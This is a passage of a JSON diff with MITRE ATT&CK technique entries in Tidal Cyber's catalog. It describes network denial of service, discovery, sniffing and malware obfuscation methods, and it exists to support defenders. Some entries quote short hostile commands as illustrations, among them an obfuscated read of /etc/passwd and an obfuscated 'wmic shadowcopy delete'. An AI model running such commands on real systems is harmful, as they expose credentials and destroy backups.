"platforms": [ + "Network" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "06f738c0-fbab-4d14-83ad-56240c8f35ac", + "type": "similar" + } + ], + "uuid": "091282d8-ef05-487f-93aa-445efaeed71b", + "value": "Network Boundary Bridging" + }, + { + "description": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://app.tidalcyber.com/technique/66657af9-83f7-4a54-b41b-301bfcdae866)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\nBotnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.[[USNYAG IranianBotnet March 2016](https://app.tidalcyber.com/references/69ee73c1-359f-4584-a6e7-75119d24bbf5)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1498.001" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "66657af9-83f7-4a54-b41b-301bfcdae866", + "value": "Direct Network Flood" + }, + { + "description": "Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.[[Cloudflare ReflectionDoS May 2017](https://app.tidalcyber.com/references/a6914c13-f95f-4c30-a129-905ed43e3454)] This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.\n\nReflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS[[Cloudflare DNSamplficationDoS](https://app.tidalcyber.com/references/734cb2bb-462a-4bdc-9774-6883f99379b9)] and NTP[[Cloudflare NTPamplifciationDoS](https://app.tidalcyber.com/references/09ce093a-d378-4915-a35f-bf18a278d873)], though the use of several others in the wild have been documented.[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)] In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.[[Cloudflare Memcrashed Feb 2018](https://app.tidalcyber.com/references/a2a0c1eb-20ad-4c40-a8cd-1732fdde7e19)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1498.002" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "66cf4803-aec1-4396-afc1-28bc27dd8b2c", + "value": "Reflection Amplification" + }, + { + "description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes[[FireEye OpPoisonedHandover February 2016](https://app.tidalcyber.com/references/1d57b1c8-930b-4bcb-a51e-39020327cc5d)] and to support other malicious activities, including distraction[[FSISAC FraudNetDoS September 2012](https://app.tidalcyber.com/references/9c8772eb-6d1d-4742-a2db-a5e1006effaa)], hacktivism, and extortion.[[Symantec DDoS October 2014](https://app.tidalcyber.com/references/878e0382-4191-4bca-8adc-c379b0d57ba8)]\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://app.tidalcyber.com/technique/8b0caea0-602e-4117-8322-b125150f5c2a).", + "meta": { + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + }, + { + "dest-uuid": "66657af9-83f7-4a54-b41b-301bfcdae866", + "type": "similar" + }, + { + "dest-uuid": "66cf4803-aec1-4396-afc1-28bc27dd8b2c", + "type": "similar" + } + ], + "uuid": "e6c14a7b-1fb8-4557-83e7-7f5b89717311", + "value": "Network Denial of Service" + }, + { + "description": "Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)] \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.\n\nWithin macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.[[apple doco bonjour description](https://app.tidalcyber.com/references/b8538d67-ab91-41c2-9cc3-a7b00c6b372a)][[macOS APT Activity Bradley](https://app.tidalcyber.com/references/7ccda957-b38d-4c3f-a8f5-6cecdcb3f584)]", + "meta": { + "platforms": [ + "Containers", + "IaaS", + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "5bab1234-8d1e-437f-88a0-d527b2dfc6cd", + "value": "Network Service Discovery" + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\nFile sharing over a Windows network occurs over the SMB protocol. [[Wikipedia Shared Resource](https://app.tidalcyber.com/references/6cc6164e-84b3-4413-9895-6719248808fb)] [[TechNet Shared Folder](https://app.tidalcyber.com/references/80a9b92a-1404-4454-88f0-dd929a12e16f)] [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) can be used to query a remote system for available shared drives using the net view \\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "ac5e465f-466d-41e4-933a-04e2c861e820", + "value": "Network Share Discovery" + }, + { + "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://app.tidalcyber.com/technique/b44a263f-76b2-4a1f-baeb-dd285974eca6), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.[[AWS Traffic Mirroring](https://app.tidalcyber.com/references/6b77a2f3-39b8-4574-8dee-cde7ba9debff)][[GCP Packet Mirroring](https://app.tidalcyber.com/references/c91c6399-3520-4410-936d-48c3b13235ca)][[Azure Virtual Network TAP](https://app.tidalcyber.com/references/3f106d7e-f101-4adb-bbd1-d8c04a347f85)] Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.[[Rhino Security Labs AWS VPC Traffic Mirroring](https://app.tidalcyber.com/references/09cac813-862c-47c8-a47f-154c5436afbb)][[SpecterOps AWS Traffic Mirroring](https://app.tidalcyber.com/references/6ab2cfa1-230f-498e-8049-fcdd2f7296dd)] The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.[[Rhino Security Labs AWS VPC Traffic Mirroring](https://app.tidalcyber.com/references/09cac813-862c-47c8-a47f-154c5436afbb)]\n\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `monitor capture`.[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)][[capture_embedded_packet_on_software](https://app.tidalcyber.com/references/5d973180-a28a-5c8f-b13a-45d21331700f)]", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "bbad213d-477d-43bf-9501-ad7d74bac323", + "value": "Network Sniffing" + }, + { + "description": "Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.[[Wikipedia OSI](https://app.tidalcyber.com/references/d1080030-12c7-4223-92ab-fb764acf111d)] Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)] Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.[[Microsoft ICMP](https://app.tidalcyber.com/references/47612548-dad1-4bf3-aa6f-a53aefa06f6a)] However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "4aed5968-6380-47d2-bbd7-3a4d959089e1", + "value": "Non-Application Layer Protocol" + }, + { + "description": "Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088[[Symantec Elfin Mar 2019](https://app.tidalcyber.com/references/55671ede-f309-4924-a1b4-3d597517b27e)] or port 587[[Fortinet Agent Tesla April 2018](https://app.tidalcyber.com/references/86a65be7-0f70-4755-b526-a26b92eabaa2)] as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.\n\nAdversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.[[change_rdp_port_conti](https://app.tidalcyber.com/references/c0deb077-6c26-52f1-9e7c-d1fb535a02a0)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "36850d17-a7d5-41ac-aa89-040b9c0b2b3f", + "value": "Non-Standard Port" + }, + { + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.[[ESET OceanLotus](https://app.tidalcyber.com/references/a7bcbaca-10c1-403a-9eb5-f111af1cbf6a)] The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.[[Securelist Malware Tricks April 2017](https://app.tidalcyber.com/references/3430ac9b-1621-42b4-9cc7-5ee60191051f)] Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.[[VirusTotal FAQ](https://app.tidalcyber.com/references/5cd965f6-c4af-40aa-8f08-620cf5f1242a)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1027.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "8352a63b-7450-4946-93c9-b7434935d794", + "value": "Binary Padding" + }, + { + "description": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) and [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)) or interactively via [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c).[[Akamai JS](https://app.tidalcyber.com/references/379a177b-0c31-5840-ad54-3fdfc9904a88)][[Malware Monday VBE](https://app.tidalcyber.com/references/9b52a72b-938a-5eb6-a3b7-5a925657f0a3)]\n\nFor example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.[[RC PowerShell](https://app.tidalcyber.com/references/0f154aa6-8c9d-5bfc-a3c4-5f3e1420f55f)] Many languages support built-in obfuscation in the form of base64 or URL encoding.[[Microsoft PowerShellB64](https://app.tidalcyber.com/references/7e50721c-c6d5-5449-8326-529da4cf5465)] Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.[[Bashfuscator Command Obfuscators](https://app.tidalcyber.com/references/c0256889-3ff0-59de-b0d1-39a947a4c89d)][[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)]\n\nAdversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe shadowcopy delete`).[[Twitter Richard WMIC](https://app.tidalcyber.com/references/7d701a8e-6816-5112-ac16-b36e71d7c5db)]\n\nTools such as Invoke-Obfuscation and Invoke-DOSfucation have also been used to obfuscate commands.[[Invoke-DOSfuscation](https://app.tidalcyber.com/references/d2f7fe4a-1a3a-5b26-8247-4f05c96974bf)][[Invoke-Obfuscation](https://app.tidalcyber.com/references/4cc6a80f-d758-524b-9519-5b839d4918bd)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1027.010" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "d8406198-626c-5659-945e-2b5105fcd0c9", + "value": "Command Obfuscation" + }, + { + "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.[[ClearSky MuddyWater Nov 2018](https://app.tidalcyber.com/references/a5f60f45-5df5-407d-9f68-bc5f7c42ee85)]\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.[[TrendMicro WindowsAppMac](https://app.tidalcyber.com/references/dc673650-1a37-4af1-aa03-8f57a064156b)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1027.004" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "bd52a415-2b7a-4048-84bf-b20f385b357e", + "value": "Compile After Delivery" + }, + { + "description": "Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.\n\nAPI functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.[[Huntress API Hash](https://app.tidalcyber.com/references/e9f91661-29e3-408e-bfdd-c7df22f3f400)][[IRED API Hashing](https://app.tidalcyber.com/references/1b8b87d5-1b70-401b-8850-d8afd3b22356)]\n\nTo avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://app.tidalcyber.com/technique/9ed5db23-3b2a-4a08-8602-bc8dff5c80f0), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.\n\nVarious methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920) during execution).[[BlackHat API Packers](https://app.tidalcyber.com/references/fc4434c0-373b-42fe-a0f5-683c24fa329e)][[Drakonia HInvoke](https://app.tidalcyber.com/references/11d936fd-aba0-4eed-8007-aca71c340c59)][[Huntress API Hash](https://app.tidalcyber.com/references/e9f91661-29e3-408e-bfdd-c7df22f3f400)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1027.007" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "9ef0ef16-b62c-4d09-b872-12c7e6adf2ed", + "value": "Dynamic API Resolution" + }, + { + "description": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://app.tidalcyber.com/technique/73a8b954-93fe-466c-b73d-bd35bb08c3e7) by not impacting execution controls such as digital signatures and notarization tickets.[[Sentinel Labs](https://app.tidalcyber.com/references/785f7692-2be8-4f5d-921e-51efdfe0c0b9)] \n\nAdversaries may embed payloads in various file formats to hide payloads.[[Microsoft Learn](https://app.tidalcyber.com/references/73ba4e07-cfbd-4b23-b52a-1ebbd7cc0fe4)] This is similar to [Steganography](https://app.tidalcyber.com/technique/f22d0738-dcb7-40c2-99cf-b426ac54224a), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.[[GitHub PSImage](https://app.tidalcyber.com/references/449c873c-c5af-45b8-8bd7-505d2181a05c)] \n\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.[[Securelist Dtrack2](https://app.tidalcyber.com/references/a011b68a-30e0-4204-9bf3-fa73f2a238b4)] Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.[[SentinelLabs reversing run-only applescripts 2021](https://app.tidalcyber.com/references/34dc9010-e800-420c-ace4-4f426c915d2f)] \n\nEmbedded content may also be used as [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) payloads used to infect benign system processes.[[Trend Micro](https://app.tidalcyber.com/references/2d4cb6f1-bc44-454b-94c1-88a81324903e)] These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.[[Malware Analysis Report ComRAT](https://app.tidalcyber.com/references/9d81e2c8-09d5-4542-9c60-13a22a5a0073)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1027.009" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "81564f1d-9c72-4d03-8561-b0d255f76c5f", + "value": "Embedded Payloads" + }, + { + "description": "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.[[Microsoft Fileless](https://app.tidalcyber.com/references/263fc1ab-f928-583f-986d-1e1bae9b3c85)][[SecureList Fileless](https://app.tidalcyber.com/references/03eb080d-0b83-5cbb-9317-c50b35996c9b)]\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://app.tidalcyber.com/technique/ef85800b-080d-4739-9f3b-91b61314a93e) and [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage.\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://app.tidalcyber.com/technique/8e32b6ed-58b1-4708-8b86-bd29c3a544d2)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.\n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.[[Microsoft Fileless](https://app.tidalcyber.com/references/263fc1ab-f928-583f-986d-1e1bae9b3c85)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1027.011" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "c41cb2d3-ff4c-5ee7-99b9-8a3d7987c9bf", + "value": "Fileless Storage" + }, + { + "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.[[HTML Smuggling Menlo Security 2020](https://app.tidalcyber.com/references/a9fc3502-66c2-4504-9886-458f8a803b5d)][[Outlflank HTML Smuggling 2018](https://app.tidalcyber.com/references/9a99f431-4d15-47f8-a31b-4f98671cd95d)]\n\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920)), potentially bypassing content filters.\n\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.[[HTML Smuggling Menlo Security 2020](https://app.tidalcyber.com/references/a9fc3502-66c2-4504-9886-458f8a803b5d)][[MSTIC NOBELIUM May 2021](https://app.tidalcyber.com/references/047ec63f-1f4b-4b57-9ab5-8a5cfcc11f4d)][[Outlflank HTML Smuggling 2018](https://app.tidalcyber.com/references/9a99f431-4d15-47f8-a31b-4f98671cd95d)][[nccgroup Smuggling HTA 2017](https://app.tidalcyber.com/references/f5615cdc-bc56-415b-8e38-6f3fd1c33c88)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1027.006" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "f216978a-36c0-47f1-a4ad-5ef67c8ae72c", + "value": "HTML Smuggling" + }, + { + "description": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1027.005" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "2507fbbc-ea9e-4e18-9329-b728847d7462", + "value": "Indicator Removal from Tools" + }, + { + "description": "Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory. \n\nAdversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)/[System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655) arguments within the target path field of the LNK.[[Unprotect Shortcut](https://app.tidalcyber.com/references/b62d40bc-2782-538a-8913-429908c6a2ee)][[Booby Trap Shortcut 2017](https://app.tidalcyber.com/references/1a820fb8-3cff-584b-804f-9bad0592873b)]\n\nLNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads. \n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1027.012" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "e2911337-76ed-5834-b621-bb2b9a4205ee", + "value": "LNK Icon Smuggling" + }, + { + "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.[[ESET FinFisher Jan 2018](https://app.tidalcyber.com/references/be169308-19e8-4ee9-8ff6-e08eb9291ef8)] \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.[[Awesome Executable Packing](https://app.tidalcyber.com/references/565bf600-5657-479b-9678-803e991c88a5)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1027.002" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "9ed5db23-3b2a-4a08-8602-bc8dff5c80f0", + "value": "Software Packing" + }, + { + "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://app.tidalcyber.com/software/d4a664e5-9819-4f33-8b2b-e6f8e6a64999) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.[[Wikipedia Duqu](https://app.tidalcyber.com/references/5cf0101e-c036-4c1c-b322-48f04e2aef0b)] \n\nBy the end of 2017, a threat group used Invoke-PSImage to hide [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) commands in an image file (.png) and execute the code on a victim's system. In this particular case the 